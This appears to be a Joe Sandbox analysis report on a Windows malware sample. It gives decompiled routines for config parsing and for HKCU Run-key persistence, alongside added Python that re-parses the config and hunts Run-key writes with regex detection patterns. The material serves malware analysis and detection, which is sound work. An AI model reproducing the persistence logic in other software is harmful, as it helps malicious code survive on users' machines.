                                       • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: 91c210c890e34cf6be2a0406e41e4d55173f8d036a7b343ae607a1e001503454
                                      • Instruction ID: 5421242918c89a46f3da1eebd07bb26af1e875fb180c4868e2a968ea58bd1996
                                      • Opcode Fuzzy Hash: 91c210c890e34cf6be2a0406e41e4d55173f8d036a7b343ae607a1e001503454
                                      • Instruction Fuzzy Hash: CCE0E530A913187BC33AAB659C2A97EBBD9DB75B21F80019DF90556340CE710A1087D5
                                      Uniqueness

                                      Uniqueness Score: 0.07%

                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 012E24B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                       • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 6a57065ebe828c9027c8c56b764a48962502f48a0e97fdebe6f2e49b570114f2
                                      • Instruction ID: ddfb421779ac52f1d06d1e3dc5313e212c68fd2a8a8d1b31092d0565c13e7173
                                      • Opcode Fuzzy Hash: 6a57065ebe828c9027c8c56b764a48962502f48a0e97fdebe6f2e49b570114f2
                                      • Instruction Fuzzy Hash: 9ED0C232781324A3C12B31866C1EBAB7BDCCB00AA2F0000E2EB0C51654C551940043D0
                                      Uniqueness

                                      Uniqueness Score: 0.35%

                                      C-Code - Quality: 100%
                                      			E002555A0(char __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v24;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				char _v76;
                                      				char _v100;
                                      				char _v108;
                                      				char _v148;
                                      				void* _t83;
                                      				void* _t94;
                                      				void* _t102;
                                      				void* _t106;
                                      				intOrPtr* _t126;
                                      				char _t175;
                                      				void* _t176;
                                      				void* _t177;
                                      				void* _t178;
                                      				void* _t179;
                                      				void* _t180;
                                      				void* _t181;
                                      				void* _t182;
                                      				intOrPtr _t184;
                                      				intOrPtr _t185;
                                      				intOrPtr _t186;
                                      				intOrPtr _t187;
                                      				intOrPtr* _t188;
                                      				void* _t189;
                                      
                                      				_t189 = __eflags;
                                      				_t175 = __ecx;
                                      				_v8 = __ecx;
                                      				Sleep(0x1f4); // executed
                                      				E0025E3ED( &_v100, _t189);
                                      				E0025E2E4( &_v100, E0025FBFC()); // executed
                                      				_t83 = E002531EC( &_v12, ".bss"); // executed
                                      				E0025E257( &_v100,  &_v148, _t83); // executed
                                      				E00255A2D(_v12);
                                      				E00252E79( &_v16,  &_v108);
                                      				E00252CCC(_t175 + 0x44,  &_v16);
                                      				E00252E66( &_v16);
                                      				E002554F2(_t175,  &_v24);
                                      				_t126 = _v24;
                                      				_t184 =  *_t126;
                                      				_t94 = E0025FC1E( &_v12, _t126 + 4, _t184); // executed
                                      				E00253264(_t175 + 0x10, _t94); // executed
                                      				E00255A2D(_v12);
                                      				_t176 = _t184 + 4;
                                      				 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t126 + _t176));
                                      				_t185 =  *((intOrPtr*)(_t126 + _t176 + 4));
                                      				_t177 = _t176 + 8;
                                      				E00253264(_v8 + 0x28, E0025FC1E( &_v12, _t126 + _t177, _t185));
                                      				E00255A2D(_v12);
                                      				_t178 = _t177 + _t185;
                                      				 *((intOrPtr*)(_v8 + 0x18)) =  *((char*)(_t126 + _t178));
                                      				_t186 =  *((intOrPtr*)(_t126 + _t178 + 1));
                                      				_t179 = _t178 + 5;
                                      				_t102 = E0025FC1E( &_v12, _t126 + _t179, _t186); // executed
                                      				E00253264(_v8 + 0x1c, _t102); // executed
                                      				E00255A2D(_v12);
                                      				_t180 = _t179 + _t186;
                                      				 *((intOrPtr*)(_v8 + 0x20)) =  *((char*)(_t126 + _t180));
                                      				_t187 =  *((intOrPtr*)(_t126 + _t180 + 1));
                                      				_t181 = _t180 + 5;
                                      				_t106 = E0025FC1E( &_v12, _t126 + _t181, _t187); // executed
                                      				E00253264(_v8 + 0x24, _t106); // executed
                                      				E00255A2D(_v12);
                                      				_t182 = _t181 + _t187;
                                      				_t188 = _v8;
                                      				 *((intOrPtr*)(_t188 + 0x2c)) =  *((intOrPtr*)(_t126 + _t182));
                                      				 *((intOrPtr*)(_t188 + 0x34)) =  *((char*)(_t126 + _t182 + 4));
                                      				 *((intOrPtr*)(_t188 + 0x38)) =  *((char*)(_t126 + _t182 + 5));
                                      				 *((intOrPtr*)(_t188 + 0x3c)) =  *((char*)(_t126 + _t182 + 6));
                                      				 *((intOrPtr*)(_t188 + 0x40)) =  *((char*)(_t126 + _t182 + 7));
                                      				E0025FC1E( &_v8, _t126 + 4 + _t182 + 8,  *((intOrPtr*)(_t126 + _t182 + 8))); // executed
                                      				E00253264(_t188 + 0x30,  &_v8); // executed
                                      				 *_t188 = 1;
                                      				 *((intOrPtr*)(_t188 + 4)) = 1;
                                      				E00255A2D(_v8);
                                      				E00252E66( &_v24);
                                      				E00252E66( &_v108);
                                      				_t165 = _v56;
                                      				if(_v56 != 0) {
                                      					E00251DB4(_t165, _t165);
                                      				}
                                      				_v56 = 0;
                                      				_v48 = 0;
                                      				_v52 = 0;
                                      				E00252E66( &_v76);
                                      				return E0025DE8B( &_v100, 0);
                                      			}

                                      APIs
                                      • Sleep.KERNEL32(000001F4,?,?,00000000), ref: 002555B6
                                        • Part of subcall function 0025FBFC: MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0025FC14
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002531F5
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253202
                                        • Part of subcall function 002531EC: lstrcpyA.KERNEL32(00000000,?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253215
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeMessageSleepVirtual
                                      • String ID: .bss
                                      • API String ID: 413233750-3890483948
                                      • Opcode ID: 74b10c7c6fa8628c34cb82fa2b1767e09e635eee1de2d9b678a9881f25139330
                                      • Instruction ID: c1a8645f5d87845f5c8d18d4f130b56f6edc458f87b4d36fa14e8d1b15d42921
                                      • Opcode Fuzzy Hash: 74b10c7c6fa8628c34cb82fa2b1767e09e635eee1de2d9b678a9881f25139330
                                      • Instruction Fuzzy Hash: 4C516F71910559EBCB04EFA4D9D18EEB7B5BF44305B1041A9E806AB242EF30BF19CF94
                                      Uniqueness

                                      Uniqueness Score: 100.00%
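The listing for E002555A0 above walks a serialized settings blob in a fixed order: for each string-type field a u32 length followed by that many bytes (passed through E0025FC1E and then stored with lstrcpyW via E00253264), interleaved with single u32 and u8 values written straight into the context structure at the offsets shown (ctx+0x10, +0x14, +0x28, +0x18, +0x1c, +0x20, +0x24, +0x2c, four flag bytes at +0x34..+0x40, then +0x30). The report does not say what any field means, and the sample's own parser performs no bounds check on the lengths it reads. The Python below is an added example, not code from the report or from the sample: it re-implements the same walk over a constructed blob, names each field by the context offset it lands in, treats E0025FC1E as a plain pass-through to UTF-16LE (an assumption; the listing does not show what it does to the bytes), and rejects any length prefix that runs past the end of the blob.

```python
"""Re-implementation of the settings walk in E002555A0 (added example).

Field order and destination offsets follow the decompiled listing; what the
fields mean is not established by the report, so they are named by offset.
"""
import struct
from typing import Callable, Dict, Union

Value = Union[int, str]


class SettingsError(ValueError):
    """A length prefix points past the end of the blob."""


class _Reader:
    """Cursor over the blob with the bounds checks the sample's code lacks."""

    def __init__(self, blob: bytes) -> None:
        self.blob = blob
        self.pos = 0

    def take(self, n: int) -> bytes:
        if n < 0 or self.pos + n > len(self.blob):
            raise SettingsError(
                f"{n} bytes requested at offset {self.pos}, blob is {len(self.blob)} bytes"
            )
        chunk = self.blob[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def u8(self) -> int:
        return self.take(1)[0]

    def u32(self) -> int:
        return struct.unpack("<I", self.take(4))[0]

    def lstring(self) -> bytes:
        """u32 little-endian length followed by that many raw bytes."""
        return self.take(self.u32())


def decode_field(raw: bytes) -> str:
    # Assumption: E0025FC1E produces a wide string (its result is copied with
    # lstrcpyW). Whether it also transforms the bytes is not visible in the
    # listing, so the raw bytes are treated as plain UTF-16LE here.
    return raw.decode("utf-16-le")


def parse_settings(blob: bytes,
                   decode: Callable[[bytes], str] = decode_field) -> Dict[str, Value]:
    """Walk the blob in the order E002555A0 does; keys are the ctx offsets written."""
    r = _Reader(blob)
    out: Dict[str, Value] = {}
    out["str_0x10"] = decode(r.lstring())    # E0025FC1E(...) -> ctx+0x10
    out["dword_0x14"] = r.u32()              # *(ctx+0x14) = u32
    out["str_0x28"] = decode(r.lstring())    # -> ctx+0x28
    out["byte_0x18"] = r.u8()                # *(ctx+0x18) = u8
    out["str_0x1c"] = decode(r.lstring())    # -> ctx+0x1c
    out["byte_0x20"] = r.u8()                # *(ctx+0x20) = u8
    out["str_0x24"] = decode(r.lstring())    # -> ctx+0x24
    out["dword_0x2c"] = r.u32()              # *(ctx+0x2c) = u32
    for off in (0x34, 0x38, 0x3c, 0x40):     # four consecutive flag bytes
        out[f"byte_{off:#x}"] = r.u8()
    out["str_0x30"] = decode(r.lstring())    # -> ctx+0x30
    return out


def is_well_formed(blob: bytes) -> bool:
    """True when every length prefix stays inside the blob and strings decode."""
    try:
        parse_settings(blob)
    except (SettingsError, UnicodeDecodeError):
        return False
    return True


def _lstr(s: str) -> bytes:
    data = s.encode("utf-16-le")
    return struct.pack("<I", len(data)) + data


def build_sample_blob() -> bytes:
    """Constructed blob in the decompiled layout; all values are made up."""
    return (_lstr("field-a") + struct.pack("<I", 0x1F90)
            + _lstr("field-b") + bytes([1])
            + _lstr("field-c") + bytes([0])
            + _lstr("field-d") + struct.pack("<I", 0x0102)
            + bytes([1, 0, 1, 0])
            + _lstr("field-e"))


if __name__ == "__main__":
    for key, value in parse_settings(build_sample_blob()).items():
        print(f"{key:11} {value!r}")
    print("truncated blob accepted:", is_well_formed(build_sample_blob()[:10]))
```

If a dump of the sample's configuration is available, swap `decode_field` for whatever E0025FC1E turns out to do and pass it as the `decode` argument; the walk itself does not change.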

                                      APIs
                                        • Part of subcall function 012E8EED: _free.LIBCMT ref: 012E8F4D
                                        • Part of subcall function 012E8B66: GetOEMCP.KERNEL32(00000000,012E8DED,?,012E4B35,013B2144,013B2144,012E4B35), ref: 012E8B91
                                      • _free.LIBCMT ref: 012E8E4A
                                      • _free.LIBCMT ref: 012E8E80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 2f1d0094ef63a3f4cde31448ded9be2ef2bc0e311eb8f6d14c522479af886a71
                                      • Instruction ID: 81b47c1efcfc4620e1fdafd0500c0938721ca49ef097f19d39f9ce16d66a8f52
                                      • Opcode Fuzzy Hash: 2f1d0094ef63a3f4cde31448ded9be2ef2bc0e311eb8f6d14c522479af886a71
                                      • Instruction Fuzzy Hash: F831C57191020AAFDB11EF68D848BEE7BF4FF44314F59015AFA54972A1EB319D50CB50
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fc555844dbe1c5ae579f2de276263b0731491c4660f22cab649b83308bce942
                                      • Instruction ID: b017cc55f01cc7ce7e2afe6232781c68a96d7443508e1a42cdf059db0ac78454
                                      • Opcode Fuzzy Hash: 0fc555844dbe1c5ae579f2de276263b0731491c4660f22cab649b83308bce942
                                      • Instruction Fuzzy Hash: E401B5376202169FEB36CE6DEC5895A37DBEBA4770F948121FA24CB148DA30D8518790
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E0025EFFE(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
                                      				long _t10;
                                      				short** _t22;
                                      				void** _t23;
                                      
                                      				_t23 = __ecx;
                                      				_t22 = _a8;
                                      				if(_a16 == 0 || E0025D721(_a4, _t22) != 0) {
                                      					L4:
                                      					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
                                      					if(_t10 != 0) {
                                      						goto L6;
                                      					}
                                      					return _t10 + 1;
                                      				} else {
                                      					_a16 = 0;
                                      					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
                                      						L6:
                                      						return 0;
                                      					}
                                      					E0025EF4C(_t23);
                                      					goto L4;
                                      				}
                                      			}

                                      APIs
                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025F04D
                                        • Part of subcall function 0025D721: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000,?,?,0025F01A,?,?,?,?,0025F392,80000001,?,000F003F), ref: 0025D737
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,0025F392,80000001,?), ref: 0025F032
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$CloseCreate
                                      • String ID:
                                      • API String ID: 1752019758-0
                                      • Opcode ID: 3ee4622dd29302e42dc1d80b7c15cda44bcbb407e69ed8e2da0a529fdf05b5c3
                                      • Instruction ID: 984433bf7a0e5d48726bdb0ae6519d25fc7d313544649b2731f406a49a436a8a
                                      • Opcode Fuzzy Hash: 3ee4622dd29302e42dc1d80b7c15cda44bcbb407e69ed8e2da0a529fdf05b5c3
                                      • Instruction Fuzzy Hash: 1501697121021EBFAF109EA1DD88DBB7BADFF4439AB144039FC0581151E7B1CD35AAA4
                                      Uniqueness

                                      Uniqueness Score: 0.24%
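E0025EFFE opens the key it is handed, creating it first when E0025D721 (a RegOpenKeyExW probe with KEY_READ, 0x00020019) reports it missing; the call stack recorded above shows the key is Software\Microsoft\Windows\CurrentVersion\Run\ under HKEY_CURRENT_USER (0x80000001), requested with KEY_ALL_ACCESS (0x000F003F). A value written under that key is the ordinary per-user autostart. The Python below is an added example, not code from the report or from the sample: it runs a small hunt over registry value-set events, flags every write under a Run or RunOnce key, and raises the severity when the autorun target or the writing process lives in a user-writable directory. The event lines are constructed for the example in a flat key=value form; the field names (EventID, Image, TargetObject, Details) are borrowed from Sysmon's RegistryEvent records, but this is not Sysmon's XML, and the value names, SIDs and paths are made up.

```python
"""Hunt for Run-key autostart writes in registry value-set events (added example).

Event lines are constructed in a flat key=value form; the field names are
borrowed from Sysmon's RegistryEvent records, but this is not Sysmon's XML.
"""
import re
from typing import Dict, List, Optional

# The key E0025EFFE opens (call stack: HKEY_CURRENT_USER, KEY_ALL_ACCESS) and
# its HKLM twin; the trailing path component is the autorun value name.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(?P<key>Run|RunOnce)\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)
# Locations a standard user can write to; an autorun pointing here is suspicious.
USER_WRITABLE_RE = re.compile(
    r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.IGNORECASE
)
FIELD_RE = re.compile(r"\b(EventID|Image|TargetObject|Details)=")

# Constructed sample events (value names, SIDs and paths are made up).
SAMPLE_EVENTS = [
    r"EventID=13 Image=C:\Users\bob\AppData\Local\Temp\4ifN8B061M.exe "
    r"TargetObject=HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater "
    r"Details=C:\Users\bob\AppData\Roaming\svchost.exe",
    r"EventID=13 Image=C:\Windows\explorer.exe "
    r"TargetObject=HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden "
    r"Details=DWORD (0x00000001)",
    r"EventID=13 Image=C:\Program Files\Vendor\setup.exe "
    r"TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray "
    r'Details="C:\Program Files\Vendor\tray.exe"',
    r"EventID=12 Image=C:\Users\bob\AppData\Local\Temp\4ifN8B061M.exe "
    r"TargetObject=HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Name=value' pairs; values may contain spaces, so split on known names."""
    parts = FIELD_RE.split(line)
    return {parts[i]: parts[i + 1].strip().strip('"')
            for i in range(1, len(parts) - 1, 2)}


def score_event(ev: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a value-set event (EventID 13) under a Run key, else None."""
    if ev.get("EventID") != "13":
        return None
    m = RUN_KEY_RE.search(ev.get("TargetObject", ""))
    if not m:
        return None
    reasons: List[str] = []
    if USER_WRITABLE_RE.search(ev.get("Details", "")):
        reasons.append("autorun target lives in a user-writable directory")
    if USER_WRITABLE_RE.search(ev.get("Image", "")):
        reasons.append("writing process runs from a user-writable directory")
    return {
        "hive": ev["TargetObject"].split("\\", 1)[0],
        "key": m.group("key"),
        "value": m.group("value"),
        "target": ev.get("Details", ""),
        "writer": ev.get("Image", ""),
        "severity": "high" if reasons else "info",
        "reasons": reasons,
    }


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Findings for every Run-key write in the supplied event lines, in input order."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        finding = score_event(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['hive']}\\...\\{f['key']}\\{f['value']} -> {f['target']}")
        for reason in f["reasons"]:
            print("    ", reason)
```

Key-creation events (EventID 12, the last sample line) are deliberately ignored: E0025EFFE creates the Run key only when it is absent, which is rare on a real host, and the value write that follows is what carries the autorun target.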

                                      APIs
                                        • Part of subcall function 012E9317: GetEnvironmentStringsW.KERNEL32 ref: 012E9320
                                        • Part of subcall function 012E9317: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 012E9343
                                        • Part of subcall function 012E9317: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012E9369
                                        • Part of subcall function 012E9317: _free.LIBCMT ref: 012E937C
                                        • Part of subcall function 012E9317: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 012E938B
                                      • _free.LIBCMT ref: 012E4E3C
                                      • _free.LIBCMT ref: 012E4E43
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID:
                                      • API String ID: 400815659-0
                                      • Opcode ID: a2e0f05add59c4b80c07537762b9375794922ca3c42313b7dc17b05e6faebfa6
                                      • Instruction ID: dbe6587f35be237acccc08c658b9231d03cae66fb02eef09e13b09c4760e2d06
                                      • Opcode Fuzzy Hash: a2e0f05add59c4b80c07537762b9375794922ca3c42313b7dc17b05e6faebfa6
                                      • Instruction Fuzzy Hash: 13E02B23A2D46341E363363D3C5D57E13C45B91339FEA0316DA14C71C1EEB0884205E5
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      APIs
                                        • Part of subcall function 012E249C: try_get_function.LIBVCRUNTIME ref: 012E24B1
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 012E22CE
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 012E22D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: 9479a5ed3db0e67a63ccf87a8723d0806ae74d4876db5a08648156551ca1e5ae
                                      • Instruction ID: 4d847db0c38dd4c3185d83196964b644b3dff7e7dfac2100fbe3108be1d32ac7
                                      • Opcode Fuzzy Hash: 9479a5ed3db0e67a63ccf87a8723d0806ae74d4876db5a08648156551ca1e5ae
                                      • Instruction Fuzzy Hash: 8CD02228838313C88F1A26B93D2E4F823CCA9226B53F05B4BC123EA4C1FF508000313A
                                      Uniqueness

                                      Uniqueness Score: 0.34%

                                      C-Code - Quality: 100%
                                      			E0025FB09(signed int _a4) {
                                      
                                      				Sleep(1); // executed
                                      				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
                                      			}

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
